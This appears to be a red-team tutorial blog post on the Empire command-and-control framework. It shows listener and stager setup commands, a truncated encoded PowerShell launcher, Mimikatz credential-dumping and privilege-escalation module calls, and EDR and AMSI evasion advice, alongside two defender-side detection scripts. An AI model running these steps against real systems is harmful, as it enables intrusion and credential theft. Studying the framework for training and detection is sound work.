github.com/BC-SECURITY/Empire, currently on the 5.x branch (Empire 5.2 as of mid-2026). This post focuses on that fork. Empire is the open-source C2 that taught a generation of operators how a real post-exploitation framework hangs together. The premise was simple: PowerShell is already running on every modern Windows endpoint, so you don’t need to drop a binary if you can drive the existing scripting surface from a beacon. Get a foothold, blend in with admin activity, pull what you need without ever writing to disk.
Empire’s role in 2026 is more bounded than it was in 2018. Mature engagements have largely shifted to Sliver (Bishop Fox, Go), Mythic (SpecterOps, Python control plane with a diverse agent ecosystem), and Havoc (C5pider). Empire is still useful for labs, training, and PowerShell-heavy Active Directory work where its module library and built-in PowerView/Mimikatz/PowerSploit integrations save real time. The listener/stager/agent loop it codified is what every modern C2 implements under different names, which means knowing Empire is still the cheapest way to understand how any of those frameworks actually work.
Architecture
Empire’s topology is the canonical one. Three components, each named the way you’d expect:
- Listener. The service waiting on your C2 host to receive incoming connections from agents. HTTP, HTTPS, and a handful of “cloud” listeners (OneDrive, Dropbox, MS Graph) that tunnel C2 through services the target environment is unlikely to block.
- Stager. The initial dropper. Small enough to deliver via a Word macro, a one-liner, or a clipboard paste. Its only job is to reach back to the listener and pull down the full agent.
- Agent. The full session, post-stage. The thing you actually interact with: run modules, push files, dump creds, pivot.
Agents Empire ships in 2026
The 5.x branch ships four agent flavors. You pick based on what’s already on the target and what the EDR is looking at:
- PowerShell agent. The original. Still works but is the most aggressively monitored surface on a modern Windows endpoint. powershell.exe invocations get hit by AMSI, the Microsoft-Windows-PowerShell ETW provider, and every EDR’s script-block logging telemetry.
- Python agent. Linux and macOS. Useful for cross-platform engagements where the target is a Mac or a Linux workstation.
- IronPython agent. Introduced in Empire 5.0. Runs a Python interpreter inside the .NET CLR on Windows. The trick: the process is .NET, not powershell.exe, so signatures targeting PowerShell don’t fire. EDR still sees a .NET process loading dynamic assemblies, which is its own signature, but it’s a different signature than the one most rules were written against.
- Sharpire (C# agent). Compiled C# beacon. Smallest footprint and the least PowerShell-flavored telemetry. Useful when you’ve already burned PowerShell on the target.
Quick start
The easiest install is the official Docker image:
docker pull bcsecurity/empire
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire
Port 1337 is Empire’s REST API. Port 5000 used to be Starkiller’s standalone web port. Since Empire 5.0, Starkiller is bundled as a submodule and served through the Empire API itself; the 5000 mapping is there for older client configurations.
Setting up a listener
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name http_public
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > set Host http://192.168.1.50
(Empire: listeners/http) > execute
[*] Listener 'http_public' successfully started
Generating a stager
Multiple launcher flavors are available; the PowerShell launcher is the path-of-least-resistance for a Windows target:
(Empire) > usestager multi/launcher
(Empire: stager/multi/launcher) > set Listener http_public
(Empire: stager/multi/launcher) > generate
[*] Payload generated!
powershell -noP -sta -w 1 -enc SQBm...
The base64-encoded blob is the one you deliver. On 2026 Windows, that exact command line is dead on arrival against any reasonable EDR. The example is here for the calling pattern, so you can see what the launcher actually looks like before getting wrapped, obfuscated, or rewritten as a Sharpire/IronPython equivalent.
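As an added defender-side example (not code from this post or from the Empire project), this is the other end of that calling pattern: triaging a process-creation command line, decoding the -enc payload (base64 over UTF-16LE) and flagging the hidden-window-plus-encoded-command shape. The sample command line is constructed; its payload is a harmless Write-Output encoded the same way, not a stager.

```python
import base64

# Abbreviations PowerShell accepts for the switches Empire's launcher combines.
SWITCH_ALIASES = {
    "NoProfile": {"-nop", "-noprofile"},
    "STA": {"-sta"},
    "WindowStyle": {"-w", "-win", "-windowstyle"},
    "EncodedCommand": {"-e", "-ec", "-enc", "-encodedcommand"},
}
TAKES_VALUE = {"WindowStyle", "EncodedCommand"}
HIDDEN_WINDOW = {"1", "hidden"}  # -WindowStyle 1 is Hidden

def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 over the UTF-16LE bytes of the script."""
    return base64.b64decode(blob).decode("utf-16-le")

def triage_command_line(cmdline: str) -> dict:
    """Report which launcher switches a command line uses and decode its payload."""
    tokens = cmdline.split()
    switches, values = [], {}
    i = 0
    while i < len(tokens):
        low = tokens[i].lower()
        name = next((n for n, a in SWITCH_ALIASES.items() if low in a), None)
        if name:
            switches.append(name)
            if name in TAKES_VALUE and i + 1 < len(tokens):
                i += 1
                values[name] = tokens[i]
        i += 1
    decoded = None
    if "EncodedCommand" in values:
        try:
            decoded = decode_encoded_command(values["EncodedCommand"])
        except (ValueError, UnicodeDecodeError):
            pass  # malformed blob: still worth an analyst's look
    hidden = values.get("WindowStyle", "").lower() in HIDDEN_WINDOW
    # Hidden window plus an encoded payload is the launcher's shape; -NoProfile/-STA alone are routine.
    return {
        "switches": switches,
        "hidden_window": hidden,
        "decoded": decoded,
        "launcher_like": hidden and "EncodedCommand" in values,
    }

# Constructed sample: the page's switch pattern, but the payload is a harmless
# Write-Output rather than a real stager.
SAMPLE_PAYLOAD = base64.b64encode(
    "Write-Output 'constructed sample'".encode("utf-16-le")).decode()
SAMPLE_CMDLINE = f"powershell -noP -sta -w 1 -enc {SAMPLE_PAYLOAD}"
```

Feeding Sysmon Event ID 1 or Security 4688 command lines through triage_command_line gives the decoded script to match against script-block rules rather than the opaque blob.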
Working with an agent
Once a stager lands and you have an agent (check via agents), Empire’s module library is where the time savings show up. A handful of the standard moves:
# Domain enumeration via PowerView
usemodule powershell/situational_awareness/network/powerview/get_domain_user
set Agent <AgentID>
execute
# Local privilege escalation checks (PowerUp)
usemodule powershell/privesc/powerup/allchecks
execute
# Credential dumping (Mimikatz logonpasswords)
usemodule powershell/credentials/mimikatz/logonpasswords
execute
Empire wraps PowerView, PowerUp, PowerSploit, and Mimikatz into named modules. That’s most of what made it the standard learning C2: every named AD technique from 2015 onward had an Empire module to demonstrate it.
Traffic and evasion
Out-of-the-box Empire traffic looks like Empire traffic. The default URI structure, the default User-Agent, the default jitter pattern: all of it is fingerprinted by mature SOC tooling and any Suricata ruleset that’s been updated since 2020. To survive past the first hour against a target with a competent blue team, the listener has to be reshaped.
Malleable C2 is the concept Raphael Mudge introduced in Cobalt Strike 2.0 (2014) for exactly this. Empire borrowed the idea and exposes per-listener customization for:
- User-Agent string. Anything from a real Chrome version to a Windows Update Agent. Match the User-Agent distribution the target environment actually generates.
- Jitter. Randomize the check-in interval so the traffic doesn’t show as a perfect-interval beacon. Common: 60 seconds with 30% jitter, meaning 42–78 second intervals.
- URI paths. The default /admin/get.php is signatured. Pick something less obvious.
- Staging key. Randomize the symmetric key used to encrypt the initial stage. The default is well-known.
All of that is table stakes. Real evasion against a 2026 EDR estate involves a lot more (process injection, syscall-direct execution, sleep masking, certificate pinning around the C2 channel) and Empire’s stock implementation is not the right baseline for any of it. Sliver and Havoc both go meaningfully further out of the box, and commercial frameworks go further still.
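An added example from the detection side (not code from this post or the Empire project) of why the default jitter and URI are table stakes: it groups proxy-log requests per flow and scores how tightly the check-in gaps sit in the 60 s / 30 % jitter band (42–78 s) the section quotes, alongside a hit on the default /admin/get.php path. The log format and the log lines are constructed for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# The one Empire default URI the page names; mature rulesets already match it.
KNOWN_DEFAULT_URIS = {"/admin/get.php"}

def in_band_fraction(gaps, jitter=0.30):
    """Share of gaps within +/-jitter of the median gap: a 60s beacon with
    30% jitter keeps every gap in 42-78s, so this nears 1.0; browsing does not."""
    med = statistics.median(gaps)
    lo, hi = med * (1 - jitter), med * (1 + jitter)
    return sum(lo <= g <= hi for g in gaps) / len(gaps)

def analyse(lines, min_requests=6, threshold=0.9):
    """Group '<ISO ts> <src> <dst> <uri>' lines per flow and score beacon timing."""
    flows = defaultdict(list)
    for line in lines:
        ts, src, dst, uri = line.split()
        flows[(src, dst)].append((datetime.fromisoformat(ts), uri))
    findings = {}
    for key, recs in flows.items():
        recs.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(recs, recs[1:])]
        res = {
            "requests": len(recs),
            "median_gap": statistics.median(gaps) if gaps else None,
            "in_band": in_band_fraction(gaps) if gaps else 0.0,
            "default_uri": bool({u for _, u in recs} & KNOWN_DEFAULT_URIS),
        }
        res["beacon_like"] = len(recs) >= min_requests and res["in_band"] >= threshold
        findings[key] = res
    return findings

# Constructed sample log: one jittered ~60s check-in flow, one host browsing normally.
SAMPLE_LOG = """\
2026-03-01T10:00:00 10.10.4.21 203.0.113.9 /admin/get.php
2026-03-01T10:00:58 10.10.4.21 203.0.113.9 /admin/get.php
2026-03-01T10:02:04 10.10.4.21 203.0.113.9 /admin/get.php
2026-03-01T10:02:53 10.10.4.21 203.0.113.9 /admin/get.php
2026-03-01T10:04:04 10.10.4.21 203.0.113.9 /admin/get.php
2026-03-01T10:04:58 10.10.4.21 203.0.113.9 /admin/get.php
2026-03-01T10:06:01 10.10.4.21 203.0.113.9 /admin/get.php
2026-03-01T10:00:00 10.10.4.22 198.51.100.7 /index.html
2026-03-01T10:00:01 10.10.4.22 198.51.100.7 /static/app.js
2026-03-01T10:00:02 10.10.4.22 198.51.100.7 /api/items
2026-03-01T10:01:40 10.10.4.22 198.51.100.7 /api/items
2026-03-01T10:05:12 10.10.4.22 198.51.100.7 /cart
"""
```

The timing score is independent of the URI and User-Agent, which is the point: changing the strings alone leaves the interval signature intact.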
AMSI and the PowerShell tax
PowerShell is the most-monitored scripting surface on Windows. The Antimalware Scan Interface (AMSI) scans every script block and downloaded buffer before execution. Empire’s PowerShell modules are heavily fingerprinted by Defender and most third-party AV/EDR products. Strings like Invoke-Mimikatz, Get-Keystrokes, and ReflectivePEInjection are signature triggers; Empire-prefixed function names are similarly hot.
The classic AMSI bypass was patching AmsiScanBuffer in memory to short-circuit the scan. That stopped being reliable around 2023, and in 2025–2026 Defender shipped behavioral signature builds (1.419.240.0 and later) that detect the in-memory patch itself. The patchless variants (DLL hijack, ETW-based, sleep-then-patch) have specific signatures of their own now. AMSI bypass in 2026 is something you research against the specific Defender build your target is running, not a one-liner you copy off a 2021 blog post.
Empire ships built-in obfuscation (token manipulation, variable randomization, string obfuscation) that’s worth enabling globally, though it mostly blunts static signatures and doesn’t help against AMSI’s behavioral analysis. Renaming modules, function names, and embedded markers before loading them helps with the GitHub-string-search class of detections; any rule that simply greps for “Invoke-Empire” in your loader will catch a default install instantly. The bigger move is shifting work off PowerShell entirely. The IronPython and Sharpire agents put you in .NET process space, which is still monitored but not nearly as hard as powershell.exe is, and the analyst rules looking for PowerShell-flavored tradecraft don’t fire on a .NET binary the same way.
When to use Empire
Empire still has real engagement uses. The main ones are training and CTF labs where AMSI bypass is the point of the exercise rather than a problem to dodge, PowerShell-heavy Active Directory work where the wrapped PowerView and Mimikatz modules save real time, and assessments of less-mature environments where modern EDR isn’t the threat model.
The places it stops being the right tool are pretty predictable. A long-haul engagement against a mature enterprise EDR is one of them: Empire’s default traffic profile is too well-fingerprinted and the PowerShell agents draw too much heat. So is anything where you need substantial customization of the C2 channel beyond what malleable-style tweaking gets you. So is any engagement where attribution to Empire would compromise the operation, since Empire usage gets flagged immediately in incident response.
For those, look at Sliver (Go-based agent, MTLS by default, generally the best open-source default in 2026), Mythic if you can invest in writing or selecting agents to fit a specific operation, or Havoc when its built-in evasion features fit the brief. Empire’s place these days is upstream of all of them. The listener/stager/agent vocabulary it codified is the same vocabulary every modern framework uses, so an operator who actually understands Empire has a pretty short ramp to whatever else they end up running.